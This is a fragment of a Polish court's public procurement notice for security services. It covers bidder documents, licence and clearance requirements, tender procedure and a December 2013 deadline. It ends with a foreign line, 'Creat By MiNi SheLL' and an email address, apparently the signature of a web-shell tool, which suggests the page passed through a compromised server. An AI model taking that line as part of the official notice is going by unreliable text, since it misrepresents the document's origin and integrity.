<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia Wykonawcy o przedłożeniu w dniu podpisania umowy licencji I stopnia dla pracowników ochrony i licencji II stopnia dla osoby nadzorującej pracowników ochrony oraz poświadczeń bezpieczeństwa upoważniających do dostępu do informacji niejawnych stanowiących tajemnicę służbową oznaczonych klauzulą -poufne- dla pracowników ochrony pełniących ochronę fizyczną wewnątrz budynku sądu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaroslaw.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Jarosławiu, ul. Jana Pawła II 11, 37-500 Jarosław, pok. nr 320 ( III pietro ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:00, miejsce: Sąd Rejonowy w Jarosławiu, ul. Jana Pawła II 11, 37-500 Jarosław, pok. 320 - III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com